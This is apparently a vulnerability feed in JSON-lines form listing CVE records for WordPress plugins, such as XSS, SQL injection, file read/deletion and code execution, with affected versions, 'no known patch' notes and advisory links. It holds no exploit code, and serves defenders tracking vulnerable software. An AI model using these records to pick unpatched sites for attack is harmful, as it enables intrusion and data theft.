{"CVE_ID":"CVE-2023-5577","slug":"wp-bitly","versionImpact":"2.7.1","description":"The Bitly's plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpbitly' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31522e54-f260-46d0-8d57-2d46af7d3450?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31522e54-f260-46d0-8d57-2d46af7d3450?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bitly\\\/trunk\\\/includes\\\/class-wp-bitly-shortlink.php?rev=2767772#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bitly\\\/trunk\\\/includes\\\/class-wp-bitly-shortlink.php?rev=2767772#L238\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0687","slug":"restrict-user-access","versionImpact":"2.5","description":"The Restrict User Access \u2013 Ultimate Membership & Content Protection plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages via API.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2109","slug":"booster-extension","versionImpact":"1.2.0","description":"The Booster Extension plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.0 via the 'booster_extension_authorbox_shortcode_display' function. This makes it possible for unauthenticated attackers to extract sensitive data including user emails","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89458095-2efe-4162-961a-7dc80852d312?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89458095-2efe-4162-961a-7dc80852d312?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booster-extension\\\/tags\\\/1.2.0\\\/inc\\\/frontend\\\/author-box-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booster-extension\\\/tags\\\/1.2.0\\\/inc\\\/frontend\\\/author-box-shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4477","slug":"wp-logs-book","versionImpact":"1.0.1","description":"The WP Logs Book WordPress plugin through 1.0.1 does not sanitise and escape some of its log data before outputting them back in an admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab551552-944c-4e2a-9355-7011cbe553b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab551552-944c-4e2a-9355-7011cbe553b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8241","slug":"nova-blocks","versionImpact":"2.1.7","description":"The Nova Blocks by Pixelgrade plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' attribute of the 'wp:separator' Gutenberg block in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3011befd-c0c6-4800-a370-e592c3ec483f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3011befd-c0c6-4800-a370-e592c3ec483f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nova-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nova-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148752\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148752\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/pixelgrade\\\/nova-blocks\\\/commit\\\/655b5b804306c3ca3a59707cc2f12098e193b4ca\",\"name\":\"https:\\\/\\\/github.com\\\/pixelgrade\\\/nova-blocks\\\/commit\\\/655b5b804306c3ca3a59707cc2f12098e193b4ca\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9614","slug":"constant-contact-forms-by-mailmunch","versionImpact":"2.1.2","description":"The Constant Contact Forms by MailMunch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92abab9e-904a-4a62-a911-a57baa9aa4af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92abab9e-904a-4a62-a911-a57baa9aa4af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10175","slug":"pricing-tables-for-visual-composer","versionImpact":"1.4","description":"The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wdo_pricing_tables shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pricing-tables-for-visual-composer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pricing-tables-for-visual-composer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79091bc0-d9b6-4a4b-926d-0447193d27c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79091bc0-d9b6-4a4b-926d-0447193d27c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2477","slug":"cryokey","versionImpact":"2.4","description":"The CryoKey plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018ckemail\u2019 parameter in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cryokey\\\/trunk\\\/cryokey.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cryokey\\\/trunk\\\/cryokey.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cryokey\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cryokey\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1646f96c-f0f4-433a-ac5e-04c1c251972d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1646f96c-f0f4-433a-ac5e-04c1c251972d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4603","slug":"store-manager-connector","versionImpact":"1.2.5","description":"The eMagicOne Store Manager for WooCommerce plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_file() function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This is only exploitable by unauthenticated attackers in default configurations where the the default password is left as 1:1, or where the attacker gains access to the credentials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4603\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4603\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L380\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L380\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4603\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4603\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/242ad00b-3602-4988-ab7a-76fba2e9d4cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/242ad00b-3602-4988-ab7a-76fba2e9d4cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5936","slug":"vr-calendar-sync","versionImpact":"2.4.7","description":"The VR Calendar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.7. This is due to missing or incorrect nonce validation on the syncCalendar() function. This makes it possible for unauthenticated attackers to trigger a calendar sync via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vr-calendar-sync\\\/trunk\\\/Admin\\\/Classes\\\/VRCalendarAdmin.class.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vr-calendar-sync\\\/trunk\\\/Admin\\\/Classes\\\/VRCalendarAdmin.class.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57dbafe8-dcb3-4ac9-ad5e-76baf1963850?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57dbafe8-dcb3-4ac9-ad5e-76baf1963850?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0718","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c26d6de-5653-4be8-9526-39b30cb61625\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c26d6de-5653-4be8-9526-39b30cb61625\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0693","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_transaction_id' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about the transaction ids of arbitrary form submissions that included payment.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f33a8db-7cd0-4a53-b2c1-cd5b7cd16214?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f33a8db-7cd0-4a53-b2c1-cd5b7cd16214?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2636","slug":"an-gradebook","versionImpact":"5.0.1","description":"The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a3bfd88-1251-4d40-b26f-62950a3ce0b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a3bfd88-1251-4d40-b26f-62950a3ce0b5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5567","slug":"qr-code-tag","versionImpact":"1.0","description":"The QR Code Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'qrcodetag' shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be004002-a3ac-46e9-b0c1-258f05f97b2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be004002-a3ac-46e9-b0c1-258f05f97b2a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qr-code-tag\\\/trunk\\\/lib\\\/qrct\\\/QrctWp.php?rev=1705525#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qr-code-tag\\\/trunk\\\/lib\\\/qrct\\\/QrctWp.php?rev=1705525#L369\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4475","slug":"wp-logs-book","versionImpact":"1.0.1","description":"The WP Logs Book WordPress plugin through 1.0.1 does not have CSRF check when clearing logs, which could allow attackers to make a logged in admin clear the logs them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0c7fa00-da6e-4f07-875f-7b85759a54b3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0c7fa00-da6e-4f07-875f-7b85759a54b3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10189","slug":"anchor-episodes-index","versionImpact":"2.1.10","description":"The Anchor Episodes Index (Spotify for Podcasters) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's anchor_episodes shortcode in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anchor-episodes-index\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anchor-episodes-index\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171752\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171752\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9578","slug":"hide-links","versionImpact":"1.4.2","description":"The Hide Links plugin for WordPress is vulnerable to unauthorized shortcode execution due to do_shortcode being hooked through the comment_text filter in all versions up to and including 1.4.2. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes available on the target site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4198bbb2-3aff-492e-a781-b0c9477baf6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4198bbb2-3aff-492e-a781-b0c9477baf6c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-links\\\/trunk\\\/class.hidelinks.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-links\\\/trunk\\\/class.hidelinks.php#L21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11184","slug":"wp-enable-svg","versionImpact":"0.7","description":"The wp-enable-svg WordPress plugin through 0.7 does not sanitize SVG files when uploaded, allowing for authors and above to upload SVGs containing malicious scripts","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc982bcb-9974-481f-aef4-580ae9edc3c8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc982bcb-9974-481f-aef4-580ae9edc3c8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12593","slug":"pdf-for-wpforms","versionImpact":"4.6.0","description":"The PDF for WPForms + Drag and Drop Template Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's yeepdf_dotab shortcode in all versions up to, and including, 4.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222206\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222206\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pdf-for-wpforms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pdf-for-wpforms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e6b24a2-55ed-40e7-bcf0-a9ceb8ea022c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e6b24a2-55ed-40e7-bcf0-a9ceb8ea022c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2303","slug":"block-logic","versionImpact":"1.0.8","description":"The Block Logic \u2013 Full Gutenberg Block Display Control plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.0.8 via the block_logic_check_logic function. This is due to the unsafe evaluation of user-controlled input. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/block-logic\\\/tags\\\/1.0.8\\\/block-logic.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/block-logic\\\/tags\\\/1.0.8\\\/block-logic.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a76f851-3f4e-4457-a33c-eede51c4b4d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a76f851-3f4e-4457-a33c-eede51c4b4d1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4602","slug":"store-manager-connector","versionImpact":"1.2.5","description":"The eMagicOne Store Manager for WooCommerce plugin for WordPress is vulnerable to Arbitrary File Reads in all versions up to, and including, 1.2.5 via the get_file() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. This is only exploitable by unauthenticated attackers in default configurations where the the default password is left as 1:1, or where the attacker gains access to the credentials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4602\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4602\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L426\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4602\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4602\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20caab24-4af7-4592-9b18-f2f5acb423c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20caab24-4af7-4592-9b18-f2f5acb423c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
